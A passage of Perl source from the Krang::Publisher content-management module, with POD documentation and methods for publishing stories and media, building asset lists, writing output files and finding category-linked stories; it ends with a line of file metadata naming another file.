C<use_category> is a boolean flag that tells Krang::Publisher whether
or not to add the current L<Krang::Category> header/footer to the
final output, as it will for the regular published output. Defaults
to true.
C<category_tmpl_args> is an optional hashref of keys/values to add
to the $fill_template_args hashref passed to category's fill_template()
method (which by default includes a single key/value pair, additional_content =>
$filename). this of course has no effect if use_category is set to 0.
C<mode> is an optional parameter which will set the permissions
of the file which is published. The mode should be specified in
octal (NOT a string). If not specified, the mode of the published
file will be based on the umask.
An optional C<post_process> code ref may be supplied that will receive
the created content as a scalarref after the optional category template
has been applied.
If you want to write binary data (e.g. images), you B<must> specify
the 'binary' argument.
B<WARNING:> C<additional_content_block()> can be called as many times
as desired, however it does not perform any sanity checks on
C<filename> - if your output contains multiple blocks of additional
content with identical filenames, they will overwrite each other, and
only the last one will remain.
=cut
sub additional_content_block {
my $self = shift;
my %args = @_;
my %block;
$block{content} = $args{content};
$block{filename} = $args{filename};
$block{binary} = $args{binary};
croak __PACKAGE__ . ": missing required argument 'content'" unless defined $block{content};
croak __PACKAGE__ . ": missing required argument 'filename'" unless length $block{filename};
$block{use_category} = exists($args{use_category}) ? $args{use_category} : 1;
$block{mode} = exists($args{mode}) ? $args{mode} : undef;
croak __PACKAGE__ . ": post_process is not a code block"
if $args{post_process} && !ref $args{post_process} eq 'CODE';
$block{post_process} = $args{post_process};
$block{category_tmpl_args} = $args{category_tmpl_args};
push @{$self->{additional_content}}, \%block;
}
=item C<< %vars = $publisher->publish_context(%set_params) >>
C<publish_context()> provides a way to set and retrieve parameters in
the L<Krang::Publisher> object during the publish process for a single
story.
C<publish_context()> takes a hash of parameters for storage, and will
return a hash of all stored parameters if called without arguments.
Note that saving the same key-value pair multiple times will result in
only the last variant being stored.
# store 'foo => bar'
$publisher->publish_context(foo => 'bar');
# $vars{foo} is 'bar'
my %vars = $publisher->publish_context();
# foo is now 'baz'
$publisher->publish_context(foo => 'baz');
Note - the internal hash used by C<publish_context()> is cleared after
every story is published - the variables stored here are not
persistant across stories.
=cut
sub publish_context {
my $self = shift;
$self->{publish_context} ||= {};
# check to see if there are params.
if (@_) {
my %args = @_;
foreach my $key (keys %args) {
$self->{publish_context}{$key} = $args{$key};
}
return;
}
return $self->{publish_context}
? %{$self->{publish_context}}
: ();
}
=item C<< $publisher->clear_publish_context() >>
Working in conjunction with C<publish_context()> above, clear the
internal hash.
Nothing is returned.
=cut
sub clear_publish_context {
my $self = shift;
delete $self->{publish_context};
$self->{publish_context} = {};
}
=item C<< $filename = $publisher->story_filename(page => $page_num); >>
Returns the filename (B<NOT> the path + filename, just the filename)
of the current story being published, given the page number.
Arguments:
=over
=item * C<page>
The page number of the story. Defaults to 0.
=item * C<story>
Optional. Defaults to L<story()>. Use it if you want a filename for
something other than what is currently being published.
=back
=cut
sub story_filename {
my ($self, %args) = @_;
my $page = $args{page} || '';
my $story = $args{story} || $self->story;
my $element = $story->element();
return $element->class()->filename(story => $story) . $page
. $element->class()->extension(story => $story);
}
=item C<< $bool = $publisher->test_publish_status(object => $story, mode => 'publish') >>
Checks the current version of the object against its' stored
C<preview_version> or C<published_version>. If the versions are not
identical, it will return true, indicating that it should be
published.
If the versions are identical, it will perform an additional check for
L<Krang::Story> objects, checking
L<Krang::ElementClass::TopLevel>->C<force_republish>.
Will return 0 (false) if it determines that there is no rule
indicating the asset should be published.
Arguments:
=over
=item * C<object>
The L<Krang::Story> or L<Krang::Media> object to be published.
=item * C<mode>
Either 'preview' or 'publish'. If this is not set, it will check
L<is_preview()> and L<is_publish()> for an indication of mode. If
those are not set either, it will croak with an error.
=back
=cut
sub test_publish_status {
my ($self, %args) = @_;
my $object = $args{object} || croak "Missing required argument 'object'";
my $mode = $args{mode};
my $publish_yes = 0;
if ($mode) {
if ($mode eq 'preview') { $self->_set_preview_mode(); }
elsif ($mode eq 'publish') { $self->_set_publish_mode(); }
else { croak __PACKAGE__ . ": unknown output mode '$mode'\n"; }
} else {
if ($self->is_preview()) { $mode = 'preview'; }
elsif ($self->is_publish()) { $mode = 'publish'; }
else {
croak "Publish mode unknown. Set the 'mode' argument'";
}
}
# check versioning.
if ($mode eq 'preview') {
$publish_yes = 1 unless ($object->preview_version == $object->version);
} else {
$publish_yes = 1 unless ($object->published_version == $object->version);
}
return $publish_yes if $publish_yes;
# otherwise, check on the filesystem for missing files.
$publish_yes = $self->_check_object_missing(object => $object);
return $publish_yes if $publish_yes;
# for stories, can check force_republish.
if ($object->isa('Krang::Story')) {
$publish_yes = $object->element->class->force_republish();
}
return $publish_yes;
}
=item C<< $url = $publisher->url_for(object => $story) >>
=item C<< $url = $publisher->url_for(object => $media) >>
=item C<< $url = $publisher->url_for(object => $category) >>
=item C<< $url = $publisher->url_for(object => $site) >>
=item C<< $url = $publisher->url_for(object => $object) >>
Returns the object's URL according to the publishing context.
Object may be a L<Krang::Story>, L<Krang::Media>,
L<Krang::Category>, L<Krang::Site> or any other object having both methods
url() and preview_url() .
Returns the empty string if $object is not an object of any type.
Croaks if $object does not have both methods url() and preview_url() .
=cut
sub url_for {
my ($self, %arg) = @_;
my $object = $arg{object};
return '' unless ref($object);
# duck typing object check
for my $method (qw(url preview_url)) {
unless ($object->can($method)) {
croak(__PACKAGE__ . ': ' . ref($object) . " misses required method '$method'.");
}
}
# build URL
if ($self->is_publish) {
return 'http://' . $object->url;
} elsif ($self->is_preview) {
my $scheme = PreviewSSL ? 'https' : 'http';
return "$scheme://" . $object->preview_url();
} else {
croak(__PACKAGE__ . ': Not in publish nor preview mode. Cannot return proper URL.');
}
}
=back
=head1 TODO
Nothing at the moment.
=head1 SEE ALSO
L<Krang::ElementClass>, L<Krang::Category>, L<Krang::Media>
=cut
# $self->_rectify_publish_locations(object => $object, paths=>[], preview => 1)
#
# remove any dangling files previously published for this object and
# update the publish location data in the DB
sub _rectify_publish_locations {
my $self = shift;
my %arg = @_;
my $object = $arg{object};
my $paths = $arg{paths} || [];
my $preview = $arg{preview};
my $type = $object->isa('Krang::Story') ? 'story' : 'media';
my $id = $type eq 'story' ? $object->story_id : $object->media_id;
my $dbh = dbh;
# get old location list
my $old_paths = $dbh->selectcol_arrayref(
"SELECT path FROM publish_${type}_location
WHERE ${type}_id = ? AND preview = ?", undef, $id, $preview
);
# build hash of current paths
my %cur = map { ($_, 1) } @$paths;
# delete any files that aren't part of the current set
foreach my $old (@$old_paths) {
next if $cur{$old};
next unless -f $old;
# make sure this path isn't claimed by another object
my ($claimed) = $dbh->selectrow_array(
"SELECT 1 FROM publish_${type}_location "
. "WHERE path = ? AND preview = ? "
. "AND ${type}_id != ?",
undef, $old, $preview, $id
);
next if $claimed;
unlink($old)
or croak("Unable to delete extinct publish result '$old'.");
}
# write new paths to publish location table if we have an id (it
# was saved)
if ($id) {
$dbh->do(
"DELETE FROM publish_${type}_location
WHERE ${type}_id = ? AND preview = ?", undef, $id, $preview
);
$dbh->do(
"INSERT INTO publish_${type}_location
(${type}_id,preview,path) VALUES " . join(',', ('(?,?,?)') x @$paths),
undef, map { ($id, $preview, $_) } @$paths
) if @$paths;
}
}
#
# _is_path_claim_stale
#
#
# Used soley in unpublish_story to see if claims in the publish_story_location table
# reflect the current path of the saved story.
# If the slug of a story is changed and the story is not published or previewed, there can
# be conflicts which used to prevent the files and the table entry from being removed.
#
sub _is_path_claim_stale {
my $self = shift;
my %args = @_;
my $type = $args{type};
my $claimed_id = $args{claimed_id};
my $claimed_path = $args{claimed_path};
if ($type eq 'story') {
my ($claimed_story) = pkg('Story')->find(story_id => $claimed_id);
if ($claimed_story) {
foreach my $current_path ($claimed_story->publish_path, $claimed_story->preview_path) {
$current_path .= '/index.html';
return if $current_path eq $claimed_path;
}
}
}
return 1;
}
#
# _deploy_testing_templates()
#
#
# Used soley in preview, searches for any templates checked out by the
# current user that are flagged as 'testing'. If it finds any,
# deploys them in a temporary directory path. The rest of the preview
# process will pick up these templates on an as-needed basis.
# (see template_search_path()
#
# Takes no arguments. Requires that $ENV{REMOTE_USER} exists.
#
sub _deploy_testing_templates {
my $self = shift;
my $path;
my $user_id = $ENV{REMOTE_USER}
|| croak __PACKAGE__ . ": 'REMOTE_USER' environment variable is not set!\n";
# update our counter so that we can pair with _undeploy_testing_templates()
$self->{_undeploy_testing_templates_counter}++;
# find any templates checked out by this user that are marked for testing.
my @templates = pkg('Template')->find(testing => 1, checked_out_by => $user_id);
# if there are no templates, there's nothing left to do here.
return unless (@templates);
# there are templates - create a tempdir & deploy these bad boys.
$path = tempdir(DIR => catdir(KrangRoot, 'tmp'));
$self->{testing_template_path}{$user_id} = $path;
foreach (@templates) {
$self->_write_template(template => $_);
}
}
#
# _undeploy_testing_templates()
#
# Removes the template files & temporary directory used by the current
# user for previewing the templates they have flagged for testing.
# This is a cleanup method, nothing more.
#
# Will croak if there's a system error or it cannot determine the user.
#
# Must be used in pairs with _deploy_testing_templates(). So if you call
# _deploy_testing_templates twice, you must call _undeploy_testing_templates()
# twice in order to un-deploy the test templates
sub _undeploy_testing_templates {
my $self = shift;
my $user_id = $ENV{REMOTE_USER}
|| croak __PACKAGE__ . ": 'REMOTE_USER' environment variable is not set!\n";
# decrement our counter if we have one so we know we were used in a pair
$self->{_undeploy_testing_templates_counter}-- if $self->{_undeploy_testing_templates_counter};
# if we're still aren't ready to cleanup then just return
return if $self->{_undeploy_testing_templates_counter};
# there's no work if there's no dir.
return unless exists($self->{testing_template_path}{$user_id});
eval { rmtree($self->{testing_template_path}{$user_id}); };
if ($@) {
croak __PACKAGE__
. ": error removing temporary dir '$self->{testing_template_path}{$user_id}': $@";
}
delete $self->{testing_template_path}{$user_id};
return;
}
#
# @paths = _build_story_all_categories(story => $story);
#
# Handles the process for publishing a story out over all its various categories.
#
# Returns a list of file-system paths where the story was written
#
sub _build_story_all_categories {
my $self = shift;
my %args = @_;
my $story = $args{story};
my @categories = $story->categories();
# Categories & Story URLs are in identical order. Move in lockstep w/ both of them.
my @paths;
foreach (my $i = 0 ; $i <= $#categories ; $i++) {
push @paths,
$self->_build_story_single_category(
story => $story,
category => $categories[$i],
);
}
# log history
if ($self->{is_publish}) {
my %history_args = $args{history_args} ? %{$args{history_args}} : ();
add_history(object => $story, action => 'publish', %history_args);
}
return @paths;
}
#
# @paths = _build_story_single_category(story => $story, category => $category);
#
# Used by both preview & publish processes.
#
# Takes a Krang::Story and Krang::Category object. Builds the story
# pages (and additional content, if it exists) for the story, and
# writes output to disk.
#
# Returns a list of files written to the filesystem (w/ complete path).
#
sub _build_story_single_category {
my $self = shift;
my %args = @_;
my @paths;
my @pages;
my $additional_content;
my ($cat_header, $cat_footer);
my $story = $args{story} || croak __PACKAGE__ . "missing argument 'story'";
my $category = $args{category} || croak __PACKAGE__ . "missing argument 'category'";
my $output_path = $self->_determine_output_path(object => $story, category => $category);
# set internal values for accessor methods to call.
$self->{category} = $category;
$self->{story} = $story;
# get root element for the story & category.
my $story_element = $story->element();
my $category_element = $category->element();
# get story output
my $article_output = $story_element->publish(publisher => $self);
# maybe add preview editor overlay
my $div = EnablePreviewEditor && $self->is_preview
? pkg('ElementClass')->_get_preview_editor_element_overlays(child => $story_element, publisher => $self)
: '';
# break the story into pages
my @article_pages = map { $div . $_ } split(/${\PAGE_BREAK}/, $article_output);
# if nothing returned, we have a problem. Throw an error.
if ($#article_pages < 0) {
my $url = $self->is_preview() ? $category->preview_url : $category->url;
Krang::Publisher::ZeroSizeOutput->throw(
message => sprintf("Story %i output for %s is zero-length", $story->story_id, $url),
story_id => $story->story_id,
category_url => $url,
story_class => $story->class->name
);
}
# chuck the last page if it's only whitespace.
if ($#article_pages > 0) {
pop @article_pages if ($article_pages[$#article_pages] =~ /^\s*$/);
}
# check to see if category output is needed
if ($story_element->use_category_templates()) {
# category pages must be published once for each story page.
if ($story_element->class->publish_category_per_page()) {
my $i = 0;
foreach my $p (@article_pages) {
my %tmpl_args = (
page_index => $i,
last_page_index => $#article_pages
);
my ($head, $foot) =
$self->_cat_content($category_element, fill_template_args => \%tmpl_args);
my $output = $head . $p . $foot;
push @pages, $output;
# cat_header and cat_footer need to be set w/ first
# page tmpl for additional content needs.
unless ($i) {
$cat_header = $head;
$cat_footer = $foot;
}
$i++;
}
} else {
($cat_header, $cat_footer) = $self->_cat_content($category_element);
# assemble the components.
foreach (@article_pages) {
my $page = $cat_header . $_ . $cat_footer;
push @pages, $page;
}
}
} else {
# no category templates being used.
@pages = @article_pages;
}
# write additional content to disk
while (my $block = shift @{$self->{additional_content}}) {
my $content = $block->{content};
if ($block->{use_category}) {
my $tmpl_args = $block->{category_tmpl_args} || {};
$tmpl_args->{additional_content} = $block->{filename};
($cat_header, $cat_footer) =
$self->_cat_content($category_element, fill_template_args => $tmpl_args)
unless (($cat_header or $cat_footer)
and not $story_element->class->publish_category_per_page());
$content = $cat_header . $content . $cat_footer;
}
if ($block->{post_process}) {
$block->{post_process}->(\$content);
}
my $output_filename = $self->_write_page(
data => $content,
filename => $block->{filename},
binary => $block->{binary},
story_id => $story->story_id,
path => $output_path
);
push(@paths, $output_filename);
# set mode if available
if (my $mode = $block->{mode}) {
chmod($mode, $output_filename)
or croak("Unable to chmod($mode, $output_filename): $!");
}
}
push @paths, $self->_write_story(story => $story, pages => \@pages, path => $output_path);
return @paths;
}
# gets header and footer from category publishing
sub _cat_content {
my ($self, $category_element, %args) = @_;
my $category_output = $category_element->publish(
publisher => $self,
%args
);
return split(/${\CONTENT}/, $category_output, 2);
}
##################################################
##
## Asset Link Checking
##
#
# @assets = _build_asset_list(object => \@story, version_check => 1, initial_assets => 1);
#
# Recursively builds the list of assets to be published, called by
# asset_list().
#
# story can be either a Krang::Story or Krang::Media object, or a
# listref of Story/Media objects.
#
# version_check will check preview/published_version if true.
# Defaults true.
#
# initial_assets will skip that check when true - used for the first
# call from asset_list(). Defaults false.
#
# maintain_versions defaults to 0. If true, we will build a list of the last-published
# version of each asset (if any) rather than the latest version.
#
# Returns a list of Krang::Story and Krang::Media objects.
#
sub _build_asset_list {
my ($self, %args) = @_;
my $object = $args{object};
my $implication_map = $args{implication_map};
my $version_check = (exists($args{version_check})) ? $args{version_check} : 1;
my $initial_assets = (exists($args{initial_assets})) ? $args{initial_assets} : 0;
my $maintain_versions = (exists($args{maintain_versions})) ? $args{maintain_versions} : 0;
my @asset_list;
my @check_list;
my @objects = (ref $object eq 'ARRAY') ? @$object : ($object);
foreach my $o (@objects) {
# don't publish (linked) objects that are retired or trashed
next if $self->is_publish() && $o->can('wont_publish') && $o->wont_publish();
# handle 'maintain_versions' mode
if ($maintain_versions) {
unless ($o->checked_out && ($o->checked_out_by != $ENV{REMOTE_USER})) {
my $v = $o->published_version;
next unless $v;
if ($v != $o->version) {
if ($o->isa('Krang::Story')) {
($o) = pkg('Story')->find(story_id => $o->story_id, version => $v);
} else {
($o) = pkg('Media')->find(media_id => $o->media_id, version => $v);
}
}
}
}
my ($publish_ok, $check_links) = $self->_check_asset_status(
object => $o,
version_check => $version_check,
initial_assets => $initial_assets
);
push @asset_list, $o if ($publish_ok);
if ($check_links) {
my $check_stories = !($self->is_preview && IgnorePreviewRelatedStoryAssets);
my $check_media = !($self->is_preview && IgnorePreviewRelatedMediaAssets);
if ($check_stories) {
my @linked_stories = $o->linked_stories(publisher => $self);
$self->_update_implication_map($implication_map, $o, \@linked_stories);
push @check_list, @linked_stories;
}
if ($check_media) {
my @linked_media = $o->linked_media;
$self->_update_implication_map($implication_map, $o, \@linked_media);
push @check_list, @linked_media;
}
}
}
# if there are objects to be checked, check 'em.
push @asset_list,
$self->_build_asset_list(
object => \@check_list,
implication_map => $implication_map,
version_check => $version_check,
maintain_versions => $maintain_versions,
initial_assets => 0,
) if (@check_list);
return @asset_list;
}
sub _stringify_implication_chain {
my $self = shift;
my $implication_map = shift;
my $o = shift;
die "Error: cannot find a chain without a starting point" unless $o;
my $object_key = $self->_implication_key($o);
die sprintf 'Error: object_key [%s] not found in implication_map', ($object_key || '-undef-')
unless (defined $implication_map->{$object_key});
return if ($implication_map->{$object_key} eq 'original publish list');
return $implication_map->{$object_key};
}
sub _update_implication_map {
my $self = shift;
my $implication_map = shift;
my $o = shift;
my $linked_assets = shift;
my $object_key = $self->_implication_key($o);
foreach my $asset (@{$linked_assets}) {
my $candidate_key = $self->_implication_key($asset);
next if $implication_map->{$candidate_key};
$implication_map->{$candidate_key} = $object_key;
}
}
sub _implication_key {
my $self = shift;
my $o = shift;
if ($o->isa('Krang::Story')) {
return 'story ' . $o->story_id;
} else {
return 'media ' . $o->media_id;
}
}
#
# ($publish_ok, $check_links) = _check_object_status(object => $object,
# initial_assets => 1
# version_check => 1);
#
# checks the Krang::Story or Krang::Media object to see if it should
# be added to the publish list, and whether or not it needs to be
# checked for related assets.
#
# object - a Krang::Story or Krang::Media object
#
#
sub _check_asset_status {
my ($self, %args) = @_;
my $object = $args{object} || croak __PACKAGE__ . ": missing argument 'object'";
my $version_check = (exists($args{version_check})) ? $args{version_check} : 1;
my $initial_assets = (exists($args{initial_assets})) ? $args{initial_assets} : 0;
my $publish_ok = 0;
my $check_links = 0;
my $instance = pkg('Conf')->instance();
if ($self->_mark_asset(object => $object)) {
if ($initial_assets || !$version_check) {
$publish_ok = 1;
} elsif ($self->test_publish_status(%args)) {
$publish_ok = 1;
}
}
if ($self->_mark_asset_links(object => $object)) {
$check_links = 1;
}
return ($publish_ok, $check_links);
}
#
# $bool = _mark_asset(object => $object)
#
# Checks to see if the object exists in the asset list.
#
# If it does not exist, the object is added to the asset list, and 1 is returned.
# If it does exist, 0 is returned.
#
sub _mark_asset {
my ($self, %args) = @_;
my $object = $args{object} || croak __PACKAGE__ . ": missing argument 'object'";
my $instance = pkg('Conf')->instance();
my $set;
my $id;
# make sure the asset list exists - non-destructive init.
$self->_init_asset_lists();
if ($object->isa('Krang::Story')) {
$set = 'story_publish_set';
$id = $object->story_id();
} elsif ($object->isa('Krang::Media')) {
$set = 'media_publish_set';
$id = $object->media_id();
} else {
# should never get here.
croak sprintf("%s->_mark_asset: unknown object type: %s\n", __PACKAGE__, $object->isa);
}
if ($self->{asset_list}{$instance}{$set}{$id}) {
return 0;
}
# not seen before.
$self->{asset_list}{$instance}{$set}{$id} = 1;
return 1;
}
#
# $bool = _mark_asset_links(object => $object)
#
# Returns 1 if the object has not been checked previously for related links.
# Returns 0 if the object has been checked before.
#
# Returns 0 if the object is not a Krang::Story object (and therefore has no related assets).
#
sub _mark_asset_links {
my ($self, %args) = @_;
my $object = $args{object} || croak __PACKAGE__ . ": missing argument 'object'";
return 0 unless ($object->isa('Krang::Story'));
# make sure the asset list exists - non-destructive init.
$self->_init_asset_lists();
my $instance = pkg('Conf')->instance();
my $story_id = $object->story_id();
if ($self->{asset_list}{$instance}{checked_links_set}{$story_id}) {
return 0;
}
$self->{asset_list}{$instance}{checked_links_set}{$story_id} = 1;
return 1;
}
#
# $bool = _check_object_missing(object => $object);
#
# Checks all possible filesystem locations for an object (e.g. where
# they could get published to), returns false if they all exist, true
# if any of them cannot be found on the filesystem
#
# object is a Krang::Story or Krang::Media object
#
sub _check_object_missing {
my ($self, %args) = @_;
my $object = $args{object} || croak __PACKAGE__ . ": missing argument 'object'";
my $bool = 0;
if ($object->isa('Krang::Story')) {
# check all categories
foreach my $cat ($object->categories) {
my $path = $self->_determine_output_path(object => $object, category => $cat);
my $filename = $self->story_filename(story => $object);
my $output_filename = catfile($path, $filename);
unless (-e $output_filename) {
# if any are missing, true.
$bool = 1;
last;
}
}
} else {
my $path = $self->_determine_output_path(object => $object);
$bool = 1 unless (-e $path);
}
return $bool;
}
#
# _init_asset_lists()
#
# Set up the internally-maintained lists of asset IDs,
# these lists are used by asset_list to determine which assets are
# going to get published.
#
sub _init_asset_lists {
my $self = shift;
my $instance = pkg('Conf')->instance();
foreach (qw(story_publish_set media_publish_set checked_links_set)) {
$self->{asset_list}{$instance}{$_} = {} unless (exists($self->{asset_list}{$instance}{$_}));
}
}
#
# _clear_asset_lists()
#
# Nukes all content in the asset lists.
#
sub _clear_asset_lists {
my $self = shift;
my $instance = pkg('Conf')->instance();
foreach (keys %{$self->{asset_list}{$instance}}) {
delete $self->{asset_list}{$instance}{$_};
}
delete $self->{asset_list};
}
############################################################
#
# ADDITIONAL CONTENT METHODS
#
##################################################
##
## Output
##
#
# $url = $pub->_write_media($media)
#
# Internal method for writing a media object to disk. Returns media URL if successful.
#
sub _write_media {
my $self = shift;
my %args = @_;
my $media = $args{media} || croak __PACKAGE__ . ": missing argument 'media'";
my $internal_path = $media->file_path();
my $output_path = $self->_determine_output_path(object => $media);
$output_path =~ /^(.*\/)[^\/]+/;
my $dir_path = $1;
# make sure the output dir exists
eval { mkpath($dir_path, 0, 0755); };
if ($@) {
Krang::Publisher::FileWriteError->throw(
message => "Could not create output directory: $@",
destination => $dir_path,
system_error => $@
);
}
# copy file out to the production path
unless (copy($internal_path, $output_path)) {
Krang::Publisher::FileWriteError->throw(
message => "Could not copy media file from " . $internal_path . ": $!",
media_id => $media->media_id(),
source => $internal_path,
destination => $output_path,
system_error => $!
);
}
# fix up output location
$self->_rectify_publish_locations(
object => $media,
paths => [$output_path],
preview => $self->{is_preview}
);
# if media element has a publish() method, call it
# (we do this in _write_media() since it's called by
# both publish_media() and preview_media())
if ($media->element->class->can('publish')) {
$media->element->class->publish(
publisher => $self,
media => $media,
element => $media->element
);
}
# return URL
$self->{is_preview} ? return $media->preview_url : return $media->url;
}
#
# @filenames = _write_story(story => $story_obj, path => $output_path, pages => \@story_pages);
#
# Given a Krang::Story object and a list of pages comprising the published
# version of the object, write the pages to the filesystem.
#
# Returns the list of files written out.
#
sub _write_story {
my $self = shift;
my %args = @_;
my $story = $args{story} || croak __PACKAGE__ . ": missing argument 'story'";
my $pages = $args{pages} || croak __PACKAGE__ . ": missing argument 'pages'";
my $output_path = $args{path} || croak __PACKAGE__ . ": missing argument 'path'";
my $class = $story->element->class;
my $mode_fn = $class->can('file_mode') || sub { };
my @created_files;
for (my $page_num = 0 ; $page_num < @$pages ; $page_num++) {
my $filename = $self->story_filename(story => $story, page => $page_num);
my $output_filename = $self->_write_page(
path => $output_path,
filename => $filename,
story_id => $story->story_id,
data => $pages->[$page_num]
);
# set mode if available
if (my $mode = $mode_fn->($class, $output_filename)) {
chmod($mode, $output_filename)
or croak("Unable to chmod($mode, $output_filename): $!");
}
push(@created_files, $output_filename);
}
return @created_files;
}
#
# $output_filename = _write_page(path => $path, filename => $filename, data => $content, story_id => $id);
#
# To write binary data:
#
# $output_filename = _write_page(path => $path, filename => $filename, data => $content, story_id => $id, binary => 0);
#
# Writes the content in $data to $path/$filename.
#
# Will croak if it cannot determine the filename, or
# cannot write to the filesystem.
#
# Returns the full path to the file written.
#
sub _write_page {
my $self = shift;
my %args = @_;
foreach (qw(path filename)) {
croak __PACKAGE__ . ": missing parameter '$_'.\n" unless defined($args{$_});
}
eval { mkpath($args{path}, 0, 0755); };
if ($@) {
Krang::Publisher::FileWriteError->throw(
message => "Could not create directory '$args{path}': $@",
destination => $args{path},
system_error => $@
);
}
my $output_filename = catfile($args{path}, $args{filename});
my $fh = pkg('IO')->io_file(">$output_filename", 'binary' => $args{binary})
or Krang::Publisher::FileWriteError->throw(
message => "Cannot output story to $output_filename: $!",
story_id => $args{story_id},
destination => $output_filename,
system_error => $!
);
$fh->print($args{data});
$fh->close();
debug("Publisher.pm: wrote page '$output_filename'");
return $output_filename;
}
#
# $filename = _write_template(template => $template);
#
# Given a template, determines the full path of the template and writes it to disk.
# Will croak in the event of an error in the process.
# Returns the full path + filename if successful.
#
sub _write_template {
my $self = shift;
my %args = @_;
my $template = $args{template};
my $id = $template->template_id();
my $category = $template->category();
my @tmpl_dirs = $self->template_search_path(category => $category);
my $path = $tmpl_dirs[0];
eval { mkpath($path, 0, 0755); };
if ($@) {
Krang::Publisher::FileWriteError->throw(
message => "Could not create publish directory: $@",
destination => $path,
system_error => $@
);
}
my $file = catfile($path, $template->filename());
# write out file
my $fh = pkg('IO')->io_file(">$file")
or Krang::Publisher::FileWriteError->throw(
message => "Cannot deploy template: $!",
template_id => $id,
destination => $file,
system_error => $!
);
$fh->print($template->{content});
$fh->close();
return $file;
}
#
# $path = $self->_determine_output_path(object => $object, category => $category);
#
# For Krang::Story objects, returns the directory under which the
# story will be written on the filesystem for a given category.
#
# For Krang::Media objects, returns the full path to file.
#
sub _determine_output_path {
my $self = shift;
my %args = @_;
my $object = $args{object} || croak __PACKAGE__ . ": missing argument 'object'";
my $output_path;
if ($self->{is_publish}) {
if ($object->isa('Krang::Story')) {
my $category = $args{category} || croak __PACKAGE__ . ": missing argument 'category'";
$output_path = $object->publish_path(category => $category);
} else {
$output_path = $object->publish_path();
}
} elsif ($self->{is_preview}) {
if ($object->isa('Krang::Story')) {
my $category = $args{category} || croak __PACKAGE__ . ": missing argument 'category'";
$output_path = $object->preview_path(category => $category);
} else {
$output_path = $object->preview_path();
}
} else {
croak __PACKAGE__ . ": Cannot determine preview/publish mode";
}
return $output_path;
}
sub _add_category_linked_stories {
my ($self, $publish_list, $implication_map) = @_;
my $user_id = $ENV{REMOTE_USER};
my %linked_stories = ();
for my $object (@$publish_list) {
next unless $object;
my $type =
$object->isa('Krang::Story') ? 'story' : $object->isa('Krang::Media') ? 'media' : undef;
next unless $type;
# don't look for candidate stories if object is checked out
if ($object->checked_out) {
if ($user_id != $object->checked_out_by) {
debug( sprintf
__PACKAGE__
. ': skipping _add_category_linked_stories on checked out %s object id=%s',
$type, (
$type eq 'story' ? $object->story_id
: $type eq 'media' ? $object->media_id
: '')
);
next;
}
}
# look for any stories that link to this category that should also be published
my $sql = qq/
SELECT story_id FROM story_category_link
WHERE category_id = ? AND publish_if_modified_${type}_in_cat = 1
/;
my $sth = dbh()->prepare_cached($sql);
for my $cat ($object->categories) {
$sth->execute($cat->category_id);
while (my $row = $sth->fetchrow_arrayref) {
# inflate story_id value into a story object, but only it isn't already marked for publishing
my $candidate_story_id = $row->[0];
unless (exists $linked_stories{$candidate_story_id}) {
my ($candidate) = pkg('Story')->find(story_id => $candidate_story_id);
if($candidate->can('wont_publish') && $candidate->wont_publish()) {
debug( sprintf
__PACKAGE__
. ': skipping candidate %s object id=%s that wont_publish',
$type, (
$type eq 'story' ? $candidate->story_id
: $type eq 'media' ? $candidate->media_id
: '')
);
next;
}
# only keep if the class method should_category_linked_publish() says the candidate should be published
if (
$candidate->element->class->should_category_linked_publish(
publisher => $self,
candidate => $candidate,
object => $object,
)
)
{
$linked_stories{$candidate_story_id} = $candidate;
$self->_update_implication_map($implication_map, $object, [$candidate]);
}
}
}
# look for stories that are linked to our parent categories that should also be published
if (my @parent_cat_ids = $cat->ancestors(ids_only => 1)) {
my $in_clause = '(' . join(',', ('?') x @parent_cat_ids) . ')';
$sql = qq/
SELECT story_id FROM story_category_link
WHERE category_id IN $in_clause AND publish_if_modified_${type}_below_cat = 1
/;
my $parents_sth = dbh()->prepare_cached($sql);
$parents_sth->execute(@parent_cat_ids);
while (my $row = $parents_sth->fetchrow_arrayref) {
my $candidate_story_id = $row->[0];
# inflate story_id value into a story object, but only it isn't already marked for publishing
unless (exists $linked_stories{$row->[0]}) {
my ($candidate) = pkg('Story')->find(story_id => $candidate_story_id);
if($candidate->can('wont_publish') && $candidate->wont_publish()) {
debug( sprintf
__PACKAGE__
. ': skipping candidate %s object id=%s that wont_publish',
$type, (
$type eq 'story' ? $candidate->story_id
: $type eq 'media' ? $candidate->media_id
: '')
);
next;
}
# only keep if the class method should_category_linked_publish() says the candidate should be published
if (
$candidate->element->class->should_category_linked_publish(
publisher => $self,
candidate => $candidate,
object => $object,
)
)
{
$linked_stories{$candidate_story_id} = $candidate;
$self->_update_implication_map($implication_map, $object, [$candidate]);
}
}
}
}
}
}
# merge and uniquify index stories into publish list
my (@publish_list, %seen);
for my $object (@$publish_list, values(%linked_stories)) {
next unless $object;
my $meth = $object->isa('Krang::Story') ? 'story_id' : 'media_id';
push @publish_list, $object
unless $seen{$meth}{$object->$meth}++;
debug(__PACKAGE__.'::_add_category_linked_stories() adding ' . $meth . ' ' . $object->$meth);
}
return \@publish_list;
}
sub what_are_my_category_linked_stories {
my ($self, $story_id_list) = @_;
my $publish_list = [];
my %seen_story_ids;
# inflate into objects
foreach my $story_id (@{$story_id_list}) {
my ($story) = pkg('Story')->find(story_id => $story_id);
push @{$publish_list}, $story;
$seen_story_ids{$story_id}++;
}
my $before_count = scalar @{$publish_list};
$publish_list = $self->_add_category_linked_stories($publish_list);
my $after_count = scalar @{$publish_list};
# no linked stories added to the list
return unless ($after_count > $before_count);
# keep a list of the new story_id values
my %new_story_ids;
foreach my $story (@{$publish_list}) {
my $story_id = $story->story_id;
$new_story_ids{$story_id}++
unless ($seen_story_ids{$story_id});
}
debug(sprintf __PACKAGE__ . '::what_are_my_category_linked_stories() [%s]',
join(',', keys(%new_story_ids)));
return [keys(%new_story_ids)];
}
############################################################
#
# MODES -
#
# The internal hash keys is_preview and is_publish are checked in a lot of places
# quick subroutines to cut down on issues.
#
sub _set_preview_mode {
my $self = shift;
$self->{is_preview} = 1;
$self->{is_publish} = 0;
}
sub _set_publish_mode {
my $self = shift;
$self->{is_preview} = 0;
$self->{is_publish} = 1;
}
my $EBN = <<EOEBN;
This is a test of the emergency broadcast network.
Please stand by and await further instructions.
EOEBN
| 30.888571 | 235 | 0.612328 |
ed7eae89d3f397492fc36da81f093c814239f613 | 1,049 | pm | Perl | lib/Google/Ads/GoogleAds/V3/Services/CampaignService/GetCampaignRequest.pm | PierrickVoulet/google-ads-perl | bc9fa2de22aa3e11b99dc22251d90a1723dd8cc4 | [
"Apache-2.0"
